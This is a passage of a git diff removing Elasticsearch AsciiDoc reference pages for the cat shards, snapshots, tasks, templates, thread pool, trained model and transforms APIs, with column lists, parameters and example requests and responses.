-Number of current suggest operations, such as `0`. - -`suggest.time`, `suti`, `suggestTime`:: -Time spent in suggest, such as `0`. - -`suggest.total`, `suto`, `suggestTotal`:: -Number of suggest operations, such as `0`. - -`sync_id`:: -Sync ID of the shard. - -`unassigned.at`, `ua`:: -Time at which the shard became unassigned in -{wikipedia}/List_of_UTC_time_offsets[Coordinated Universal -Time (UTC)]. - -`unassigned.details`, `ud`:: -Details about why the shard became unassigned. - -`unassigned.for`, `uf`:: -Time at which the shard was requested to be unassigned in -{wikipedia}/List_of_UTC_time_offsets[Coordinated Universal -Time (UTC)]. - -[[reason-unassigned]] -`unassigned.reason`, `ur`:: -Reason the shard is unassigned. Returned values are: -+ -* `ALLOCATION_FAILED`: Unassigned as a result of a failed allocation of the shard. -* `CLUSTER_RECOVERED`: Unassigned as a result of a full cluster recovery. -* `DANGLING_INDEX_IMPORTED`: Unassigned as a result of importing a dangling index. 
-* `EXISTING_INDEX_RESTORED`: Unassigned as a result of restoring into a closed index. -* `INDEX_CREATED`: Unassigned as a result of an API creation of an index. -* `INDEX_REOPENED`: Unassigned as a result of opening a closed index. -* `NEW_INDEX_RESTORED`: Unassigned as a result of restoring into a new index. -* `NODE_LEFT`: Unassigned as a result of the node hosting it leaving the cluster. -* `REALLOCATED_REPLICA`: A better replica location is identified and causes the existing replica allocation to be cancelled. -* `REINITIALIZED`: When a shard moves from started back to initializing. -* `REPLICA_ADDED`: Unassigned as a result of explicit addition of a replica. -* `REROUTE_CANCELLED`: Unassigned as a result of explicit cancel reroute command. - --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-shards-api-example]] -==== {api-examples-title} - -[[cat-shards-api-example-single]] -===== Example with a single data stream or index - -[source,console] ---------------------------------------------------------------------------- -GET _cat/shards ---------------------------------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following response: - -[source,txt] ---------------------------------------------------------------------------- -my-index-000001 0 p STARTED 3014 31.1mb 192.168.56.10 H5dfFeA ---------------------------------------------------------------------------- -// TESTRESPONSE[s/3014/\\d+/] -// TESTRESPONSE[s/31.1mb/\\d+(\.\\d+)?[kmg]?b/] -// TESTRESPONSE[s/192.168.56.10/.*/] -// TESTRESPONSE[s/H5dfFeA/node-0/ non_json] - -[[cat-shards-api-example-wildcard]] -===== Example with a wildcard pattern - -If your cluster has many shards, you can use a wildcard pattern in the -`` path parameter to limit the API request. - -The following request returns information for any data streams or indices -beginning with `my-index-`. 
-
-[source,console]
---------------------------------------------------------------------------
-GET _cat/shards/my-index-*
---------------------------------------------------------------------------
-// TEST[setup:my_index]
-
-The API returns the following response:
-
-[source,txt]
---------------------------------------------------------------------------
-my-index-000001 0 p STARTED 3014 31.1mb 192.168.56.10 H5dfFeA
---------------------------------------------------------------------------
-// TESTRESPONSE[s/3014/\\d+/]
-// TESTRESPONSE[s/31.1mb/\\d+(\.\\d+)?[kmg]?b/]
-// TESTRESPONSE[s/192.168.56.10/.*/]
-// TESTRESPONSE[s/H5dfFeA/node-0/ non_json]
-
-
-[[relocation]]
-===== Example with a relocating shard
-
-[source,console]
---------------------------------------------------------------------------
-GET _cat/shards
---------------------------------------------------------------------------
-// TEST[skip:for now, relocation cannot be recreated]
-
-The API returns the following response:
-
-[source,txt]
---------------------------------------------------------------------------
-my-index-000001 0 p RELOCATING 3014 31.1mb 192.168.56.10 H5dfFeA -> -> 192.168.56.30 bGG90GE
---------------------------------------------------------------------------
-// TESTRESPONSE[non_json]
-
-The `RELOCATING` value in the `state` column indicates the index shard is
-relocating.
-
-[[states]]
-===== Example with shard states
-
-Before a shard is available for use, it goes through an `INITIALIZING` state.
-You can use the cat shards API to see which shards are initializing.
-
-[source,console]
---------------------------------------------------------------------------
-GET _cat/shards
---------------------------------------------------------------------------
-// TEST[skip:there is no guarantee to test for shards in initializing state]
-
-The API returns the following response:
-
-[source,txt]
---------------------------------------------------------------------------
-my-index-000001 0 p STARTED 3014 31.1mb 192.168.56.10 H5dfFeA
-my-index-000001 0 r INITIALIZING 0 14.3mb 192.168.56.30 bGG90GE
---------------------------------------------------------------------------
-// TESTRESPONSE[non_json]
-
-===== Example with reasons for unassigned shards
-
-The following request returns the `unassigned.reason` column, which indicates
-why a shard is unassigned.
-
-
-[source,console]
---------------------------------------------------------------------------
-GET _cat/shards?h=index,shard,prirep,state,unassigned.reason
---------------------------------------------------------------------------
-// TEST[skip:for now]
-
-The API returns the following response:
-
-[source,txt]
---------------------------------------------------------------------------
-my-index-000001 0 p STARTED 3014 31.1mb 192.168.56.10 H5dfFeA
-my-index-000001 0 r STARTED 3014 31.1mb 192.168.56.30 bGG90GE
-my-index-000001 0 r STARTED 3014 31.1mb 192.168.56.20 I8hydUG
-my-index-000001 0 r UNASSIGNED ALLOCATION_FAILED
---------------------------------------------------------------------------
-// TESTRESPONSE[non_json]
diff --git a/docs/reference/cat/snapshots.asciidoc b/docs/reference/cat/snapshots.asciidoc
deleted file mode 100644
index 2bce47e3ed9..00000000000
--- a/docs/reference/cat/snapshots.asciidoc
+++ /dev/null
@@ -1,139 +0,0 @@
-[[cat-snapshots]]
-=== cat snapshots API
-++++
-cat snapshots
-++++
-
-Returns information about the <> stored in one or
-more repositories. A snapshot is a backup of an index or running {es} cluster.
-
-
-[[cat-snapshots-api-request]]
-==== {api-request-title}
-
-`GET /_cat/snapshots/`
-
-[[cat-snapshots-api-prereqs]]
-==== {api-prereq-title}
-
-* If the {es} {security-features} are enabled, you must have the
-`monitor_snapshot`, `create_snapshot`, or `manage`
-<> to use this API.
-
-
-[[cat-snapshots-path-params]]
-==== {api-path-parms-title}
-
-``::
-+
---
-(Required, string) Snapshot repository used to limit the request.
-
-If the repository fails during the request, {es} returns an error.
---
-
-
-[[cat-snapshots-query-params]]
-==== {api-query-parms-title}
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format]
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h]
-+
---
-If you do not specify which columns to include, the API returns the default
-columns in the order listed below. If you explicitly specify one or more
-columns, it only returns the specified columns.
-
-Valid columns are:
-
-`id`, `snapshot`::
-(Default) ID of the snapshot, such as `snap1`.
-
-`repository`, `re`, `repo`::
-(Default) Name of the repository, such as `repo1`.
-
-`status`, `s`::
-(Default) State of the snapshot process. Returned values are:
-+
-* `FAILED`: The snapshot process failed.
-* `INCOMPATIBLE`: The snapshot process is incompatible with the current cluster
-version.
-* `IN_PROGRESS`: The snapshot process started but has not completed.
-* `PARTIAL`: The snapshot process completed with a partial success.
-* `SUCCESS`: The snapshot process completed with a full success.
-
-`start_epoch`, `ste`, `startEpoch`::
-(Default) {wikipedia}/Unix_time[Unix `epoch` time] at which
-the snapshot process started.
-
-`start_time`, `sti`, `startTime`::
-(Default) `HH:MM:SS` time at which the snapshot process started.
-
-`end_epoch`, `ete`, `endEpoch`::
-(Default) {wikipedia}/Unix_time[Unix `epoch` time] at which
-the snapshot process ended.
-
-`end_time`, `eti`, `endTime`::
-(Default) `HH:MM:SS` time at which the snapshot process ended.
-
-`duration`, `dur`::
-(Default) Time it took the snapshot process to complete in <>.
-
-`indices`, `i`::
-(Default) Number of indices in the snapshot.
-
-`successful_shards`, `ss`::
-(Default) Number of successful shards in the snapshot.
-
-`failed_shards`, `fs`::
-(Default) Number of failed shards in the snapshot.
-
-`total_shards`, `ts`::
-(Default) Total number of shards in the snapshot.
-
-`reason`, `r`::
-Reason for any snapshot failures.
---
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help]
-
-`ignore_unavailable`::
-(Optional, Boolean) If `true`, the response does not include information from
-unavailable snapshots. Defaults to `false`.
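As a sketch of how these parameters combine (illustrative only; `repo1` and the `s` sort parameter follow the example at the end of this page, and `start_epoch` is one of the columns listed above):

[source,console]
--------------------------------------------------
GET /_cat/snapshots/repo1?v=true&s=start_epoch&ignore_unavailable=true
--------------------------------------------------
// TEST[skip:editorial sketch, not part of the tested examples]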
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-snapshots-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/snapshots/repo1?v=true&s=id --------------------------------------------------- -// TEST[s/^/PUT \/_snapshot\/repo1\/snap1?wait_for_completion=true\n/] -// TEST[s/^/PUT \/_snapshot\/repo1\/snap2?wait_for_completion=true\n/] -// TEST[s/^/PUT \/_snapshot\/repo1\n{"type": "fs", "settings": {"location": "repo\/1"}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id status start_epoch start_time end_epoch end_time duration indices successful_shards failed_shards total_shards -snap1 FAILED 1445616705 18:11:45 1445616978 18:16:18 4.6m 1 4 1 5 -snap2 SUCCESS 1445634298 23:04:58 1445634672 23:11:12 6.2m 2 10 0 10 --------------------------------------------------- -// TESTRESPONSE[s/FAILED/SUCCESS/ s/14456\d+/\\d+/ s/\d+(\.\d+)?(m|s|ms)/\\d+(\\.\\d+)?(m|s|ms)/] -// TESTRESPONSE[s/\d+:\d+:\d+/\\d+:\\d+:\\d+/] -// TESTRESPONSE[s/1 4 1 5/\\d+ \\d+ \\d+ \\d+/] -// TESTRESPONSE[s/2 10 0 10/\\d+ \\d+ \\d+ \\d+/] -// TESTRESPONSE[non_json] - diff --git a/docs/reference/cat/tasks.asciidoc b/docs/reference/cat/tasks.asciidoc deleted file mode 100644 index 261955235a1..00000000000 --- a/docs/reference/cat/tasks.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ -[[cat-tasks]] -=== cat task management API -++++ -cat task management -++++ - -beta::["The cat task management API is new and should still be considered a beta feature. The API may change in ways that are not backwards compatible.",{es-issue}51628] - -Returns information about tasks currently executing in the cluster, -similar to the <> API. - - -[[cat-tasks-api-request]] -==== {api-request-title} - -`GET /_cat/tasks` - -[[cat-tasks-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-tasks-api-desc]] -==== {api-description-title} - -The cat task management API returns information -about tasks currently executing -on one or more nodes in the cluster. -It is a more compact view -of the JSON <> API. - - -[[cat-tasks-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=detailed] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -`nodes`:: -(Optional, string) -Comma-separated list of node IDs or names used to limit the response. Supports -wildcard (`*`) expressions. - -`parent_task_id`:: -(Optional, string) -Parent task ID used to limit the response. 
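For example, a request that narrows the listing to two nodes and asks for detailed task information might look like the following sketch (illustrative only; `node-1` and `node-2` are placeholder node names):

[source,console]
--------------------------------------------------
GET /_cat/tasks?v=true&detailed=true&nodes=node-1,node-2
--------------------------------------------------
// TEST[skip:editorial sketch, not part of the tested examples]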
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-tasks-api-response-codes]] -==== {api-response-codes-title} - -include::{es-repo-dir}/cluster/tasks.asciidoc[tag=tasks-api-404] - - -[[cat-tasks-api-examples]] -==== {api-examples-title} - -[source,console] ----- -GET _cat/tasks?v=true ----- -// TEST[skip:No tasks to retrieve] - -The API returns the following response: - -[source,console-result] ----- -action task_id parent_task_id type start_time timestamp running_time ip node -cluster:monitor/tasks/lists[n] oTUltX4IQMOUUVeiohTt8A:124 oTUltX4IQMOUUVeiohTt8A:123 direct 1458585884904 01:48:24 44.1micros 127.0.0.1:9300 oTUltX4IQMOUUVeiohTt8A -cluster:monitor/tasks/lists oTUltX4IQMOUUVeiohTt8A:123 - transport 1458585884904 01:48:24 186.2micros 127.0.0.1:9300 oTUltX4IQMOUUVeiohTt8A ----- -// TESTRESPONSE[skip:No tasks to retrieve] -// TESTRESPONSE[non_json] diff --git a/docs/reference/cat/templates.asciidoc b/docs/reference/cat/templates.asciidoc deleted file mode 100644 index 8650e3d4dab..00000000000 --- a/docs/reference/cat/templates.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -[[cat-templates]] -=== cat templates API -++++ -cat templates -++++ - -Returns information about <> in a cluster. -You can use index templates to apply <> -and <> to new indices at creation. - - -[[cat-templates-api-request]] -==== {api-request-title} - -`GET /_cat/templates/` - -`GET /_cat/templates` - -[[cat-templates-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-templates-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) Comma-separated list of index template names used to limit -the request. Accepts wildcard expressions. 
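For instance, to check a single template by its exact name, the request might look like this sketch (illustrative only; `my-template-0` matches a template created in the test setup of the example below):

[source,console]
--------------------------------------------------
GET /_cat/templates/my-template-0?v=true&h=name,index_patterns,version
--------------------------------------------------
// TEST[skip:editorial sketch, not part of the tested examples]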
- - -[[cat-templates-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-templates-api-example]] -==== {api-examples-title} - -[source,console] ----- -GET _cat/templates/my-template-*?v=true&s=name ----- -// TEST[s/^/PUT _index_template\/my-template-0\n{"index_patterns": "te*", "priority": 200}\n/] -// TEST[s/^/PUT _index_template\/my-template-1\n{"index_patterns": "tea*", "priority": 201}\n/] -// TEST[s/^/PUT _index_template\/my-template-2\n{"index_patterns": "teak*", "priority": 202, "version": 7}\n/] - -The API returns the following response: - -[source,txt] ----- -name index_patterns order version composed_of -my-template-0 [te*] 200 [] -my-template-1 [tea*] 201 [] -my-template-2 [teak*] 202 7 [] ----- -// TESTRESPONSE[s/\*/\\*/ s/\[/\\[/ s/\]/\\]/ non_json] - -//// -[source,console] ----- -DELETE _index_template/my-template-0 -DELETE _index_template/my-template-1 -DELETE _index_template/my-template-2 ----- -// TEST[continued] -//// diff --git a/docs/reference/cat/thread_pool.asciidoc b/docs/reference/cat/thread_pool.asciidoc deleted file mode 100644 index 7bc1598515e..00000000000 --- a/docs/reference/cat/thread_pool.asciidoc +++ /dev/null @@ -1,178 +0,0 @@ -[[cat-thread-pool]] -=== cat thread pool API -++++ -cat thread pool -++++ - -Returns thread pool statistics for each node in a cluster. Returned information -includes all <> and custom thread -pools. - - -[[cat-thread-pool-api-request]] -==== {api-request-title} - -`GET /_cat/thread_pool/` - -`GET /_cat/thread_pool` - -[[cat-thread-pool-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-thread-pool-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) Comma-separated list of thread pool names used to limit the -request. Accepts wildcard expressions. - - -[[cat-thread-pool-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ --- -If you do not specify which columns to include, the API returns the default -columns in the order listed below. If you explicitly specify one or more -columns, it only returns the specified columns. - -Valid columns are: - -`node_name`:: -(Default) Node name, such as `I8hydUG`. - -`name`:: -(Default) Name of the thread pool, such as `analyze` or `generic`. - -`active`, `a`:: -(Default) Number of active threads in the current thread pool. - -`queue`,`q`:: -(Default) Number of tasks in the queue for the current thread pool. - -`rejected`, `r`:: -(Default) Number of tasks rejected by the thread pool executor. - -`completed`, `c`:: -Number of tasks completed by the thread pool executor. - -`core`, `cr`:: -Configured core number of active threads allowed in the current thread pool. - -`ephemeral_id`,`eid`:: -Ephemeral node ID. - -`host`, `h`:: -Hostname for the current node. - -`ip`, `i`:: -IP address for the current node. 
- -`keep_alive`, `k`:: -Configured keep alive time for threads. - -`largest`, `l`:: -Highest number of active threads in the current thread pool. - -`max`, `mx`:: -Configured maximum number of active threads allowed in the current thread pool. - -`node_id`, `id`:: -ID of the node, such as `k0zy`. - -`pid`, `p`:: -Process ID of the running node. - -`pool_size`, `psz`:: -Number of threads in the current thread pool. - -`port`, `po`:: -Bound transport port for the current node. - -`queue_size`, `qs`:: -Maximum number of tasks permitted in the queue for the current thread pool. - -`size`, `sz`:: -Configured fixed number of active threads allowed in the current thread pool. - -`type`, `t`:: -Type of thread pool. Returned values are `fixed` or `scaling`. - --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -`size`:: -(Optional, <>) Multiplier used to display quantities. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-thread-pool-api-example]] -==== {api-examples-title} - -[[cat-thread-pool-api-ex-default]] -===== Example with default columns - -[source,console] --------------------------------------------------- -GET /_cat/thread_pool --------------------------------------------------- - -The API returns the following response: - -[source,txt] --------------------------------------------------- -node-0 analyze 0 0 0 -... -node-0 fetch_shard_started 0 0 0 -node-0 fetch_shard_store 0 0 0 -node-0 flush 0 0 0 -... -node-0 write 0 0 0 --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./(node-0 \\S+ 0 0 0\n)*/] -// TESTRESPONSE[s/\d+/\\d+/ non_json] -// The substitutions do two things: -// 1. Expect any number of extra thread pools. This allows us to only list a -// few thread pools. The list would be super long otherwise. In addition, -// if xpack is installed then the list will contain more thread pools and -// this way we don't have to assert about them. -// 2. Expect any number of active, queued, or rejected items. We really don't -// know how many there will be and we just want to assert that there are -// numbers in the response, not *which* numbers are there. - - -[[cat-thread-pool-api-ex-headings]] -===== Example with explicit columns - -The following API request returns the `id`, `name`, `active`, `rejected`, and -`completed` columns. The request limits returned information to the `generic` -thread pool. 
-
-[source,console]
---------------------------------------------------
-GET /_cat/thread_pool/generic?v=true&h=id,name,active,rejected,completed
---------------------------------------------------
-
-The API returns the following response:
-
-[source,txt]
---------------------------------------------------
-id name active rejected completed
-0EWUhXeBQtaVGlexUeVwMg generic 0 0 70
---------------------------------------------------
-// TESTRESPONSE[s/0EWUhXeBQtaVGlexUeVwMg/[\\w-]+/ s/\d+/\\d+/ non_json]
-
diff --git a/docs/reference/cat/trainedmodel.asciidoc b/docs/reference/cat/trainedmodel.asciidoc
deleted file mode 100644
index f3783c25c1d..00000000000
--- a/docs/reference/cat/trainedmodel.asciidoc
+++ /dev/null
@@ -1,125 +0,0 @@
-[role="xpack"]
-[testenv="platinum"]
-[[cat-trained-model]]
-=== cat trained model API
-++++
-cat trained model
-++++
-
-Returns configuration and usage information about {infer} trained models.
-
-
-[[cat-trained-model-request]]
-==== {api-request-title}
-
-`GET /_cat/ml/trained_models`
-
-
-[[cat-trained-model-prereqs]]
-==== {api-prereq-title}
-
-If the {es} {security-features} are enabled, you must have the following
-privileges:
-
-* cluster: `monitor_ml`
-
-For more information, see <> and {ml-docs-setup-privileges}.
-
-
-////
-[[cat-trained-model-desc]]
-==== {api-description-title}
-////
-
-
-[[cat-trained-model-query-params]]
-==== {api-query-parms-title}
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes]
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format]
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h]
-+
-If you do not specify which columns to include, the API returns the default
-columns. If you explicitly specify one or more columns, it returns only the
-specified columns.
-+
-Valid columns are:
-
-`create_time`, `ct`:::
-The time when the trained model was created.
-
-`created_by`, `c`, `createdBy`:::
-Information on the creator of the trained model.
-
-`data_frame_analytics_id`, `df`, `dataFrameAnalytics`:::
-Identifier for the {dfanalytics-job} that created the model. Only displayed if
-it is still available.
-
-`description`, `d`:::
-The description of the trained model.
-
-`heap_size`, `hs`, `modelHeapSize`:::
-(Default)
-The estimated heap size to keep the trained model in memory.
-
-`id`:::
-(Default)
-Identifier for the trained model.
-
-`ingest.count`, `ic`, `ingestCount`:::
-The total number of documents that are processed by the model.
-
-`ingest.current`, `icurr`, `ingestCurrent`:::
-The total number of documents that are currently being handled by the trained
-model.
-
-`ingest.failed`, `if`, `ingestFailed`:::
-The total number of failed ingest attempts with the trained model.
-
-`ingest.pipelines`, `ip`, `ingestPipelines`:::
-(Default)
-The total number of ingest pipelines that are referencing the trained model.
-
-`ingest.time`, `it`, `ingestTime`:::
-The total time that is spent processing documents with the trained model.
-
-`license`, `l`:::
-The license level of the trained model.
-
-`operations`, `o`, `modelOperations`:::
-(Default)
-The estimated number of operations to use the trained model. This number helps
-measure the computational complexity of the model.
-
-`version`, `v`:::
-The {es} version number in which the trained model was created.
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help]
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s]
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time]
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v]
-
-
-[[cat-trained-model-example]]
-==== {api-examples-title}
-
-[source,console]
---------------------------------------------------
-GET _cat/ml/trained_models?h=c,o,l,ct,v&v=true
---------------------------------------------------
-// TEST[skip:kibana sample data]
-
-
-[source,console-result]
-----
-id created_by operations license create_time version
-ddddd-1580216177138 _xpack 196 PLATINUM 2020-01-28T12:56:17.138Z 8.0.0
-flight-regress-1580215685537 _xpack 102 PLATINUM 2020-01-28T12:48:05.537Z 8.0.0
-lang_ident_model_1 _xpack 39629 BASIC 2019-12-05T12:28:34.594Z 7.6.0
-----
-// TESTRESPONSE[skip:kibana sample data]
diff --git a/docs/reference/cat/transforms.asciidoc b/docs/reference/cat/transforms.asciidoc
deleted file mode 100644
index 947bfdd81aa..00000000000
--- a/docs/reference/cat/transforms.asciidoc
+++ /dev/null
@@ -1,195 +0,0 @@
-[[cat-transforms]]
-=== cat {transforms} API
-++++
-cat transforms
-++++
-
-Returns configuration and usage information about {transforms}.
-
-[[cat-transforms-api-request]]
-==== {api-request-title}
-
-`GET /_cat/transforms/` +
-
-`GET /_cat/transforms/_all` +
-
-`GET /_cat/transforms/*` +
-
-`GET /_cat/transforms`
-
-[[cat-transforms-api-prereqs]]
-==== {api-prereq-title}
-
-* If the {es} {security-features} are enabled, you must have `monitor_transform`
-cluster privileges to use this API. The built-in `transform_user` role has these
-privileges. For more information, see <> and
-<>.
-
-//[[cat-transforms-api-desc]]
-//==== {api-description-title}
-
-[[cat-transforms-api-path-params]]
-==== {api-path-parms-title}
-
-``::
-(Optional, string)
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=transform-id-wildcard]
-
-[[cat-transforms-api-query-params]]
-==== {api-query-parms-title}
-
-`allow_no_match`::
-(Optional, Boolean)
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-match-transforms1]
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format]
-
-`from`::
-(Optional, integer)
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=from-transforms]
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h]
-+
-If you do not specify which columns to include, the API returns the default
-columns. If you explicitly specify one or more columns, it returns only the
-specified columns.
-+
-Valid columns are:
-
-`changes_last_detection_time`, `cldt`:::
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=checkpointing-changes-last-detected-at]
-
-`checkpoint_duration_time_exp_avg`, `cdtea`, `checkpointTimeExpAvg`:::
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=exponential-avg-checkpoint-duration-ms]
-
-`create_time`, `ct`, `createTime`:::
-(Default)
-The time the {transform} was created.
-
-`description`, `d`:::
-(Default)
-The description of the {transform}.
- -`dest_index`, `di`, `destIndex`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=dest-index] - -`documents_indexed`, `doci`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-indexed] - -`docs_per_second`, `dps`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=transform-settings-docs-per-second] - -`documents_processed`, `docp`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-processed] - -`frequency`, `f`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=frequency] - -`id`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=transform-id] - -`index_failure`, `if`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-failures] - -`index_time`, `itime`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-time-ms] - -`index_total`, `it`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-total] - -`indexed_documents_exp_avg`, `idea`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=exponential-avg-documents-indexed] - -`max_page_search_size`, `mpsz`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=transform-settings-max-page-search-size] - -`pages_processed`, `pp`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=pages-processed] - -`pipeline`, `p`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=dest-pipeline] - -`processed_documents_exp_avg`, `pdea`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=exponential-avg-documents-processed] - -`processing_time`, `pt`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=processing-time-ms] - -`reason`, `r`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=state-transform-reason] - -`search_failure`, `sf`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-failures] - -`search_time`, `stime`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-time-ms] - -`search_total`, `st`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-total] - -`source_index`, `si`, `sourceIndex`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source-index-transforms] - -`state`, `s`::: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=state-transform] - -`transform_type`, `tt`::: -(Default) -Indicates the type of {transform}: `batch` or `continuous`. - -`trigger_count`, `tc`::: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=trigger-count] - -`version`, `v`::: -(Default) -The version of {es} that existed on the node when the {transform} was -created. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -`size`:: -(Optional, integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=size-transforms] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -[[cat-transforms-api-examples]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/transforms?v=true&format=json --------------------------------------------------- -// TEST[skip:kibana sample data] - -[source,console-result] ----- -[ - { - "id" : "ecommerce_transform", - "create_time" : "2020-03-20T20:31:25.077Z", - "version" : "7.7.0", - "source_index" : "kibana_sample_data_ecommerce", - "dest_index" : "kibana_sample_data_ecommerce_transform", - "pipeline" : null, - "description" : "Maximum priced ecommerce data by customer_id in Asia", - "transform_type" : "continuous", - "frequency" : "5m", - "max_page_search_size" : "500", - "state" : "STARTED" - } -] ----- -// TESTRESPONSE[skip:kibana sample data] diff --git a/docs/reference/ccr/apis/auto-follow/delete-auto-follow-pattern.asciidoc b/docs/reference/ccr/apis/auto-follow/delete-auto-follow-pattern.asciidoc deleted file mode 100644 index 602910bdda4..00000000000 --- a/docs/reference/ccr/apis/auto-follow/delete-auto-follow-pattern.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-delete-auto-follow-pattern]] -=== Delete auto-follow pattern API -++++ -Delete auto-follow pattern -++++ - -Delete auto-follow patterns. - -[[ccr-delete-auto-follow-pattern-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/my_auto_follow_pattern -{ - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index" - ], - "follow_index_pattern" : "{{leader_index}}-follower" -} --------------------------------------------------- -// TEST[setup:remote_cluster] -// TESTSETUP - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/ --------------------------------------------------- -// TEST[s//my_auto_follow_pattern/] - -[[ccr-delete-auto-follow-pattern-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ccr` cluster -privileges on the cluster that contains the follower index. For more information, -see 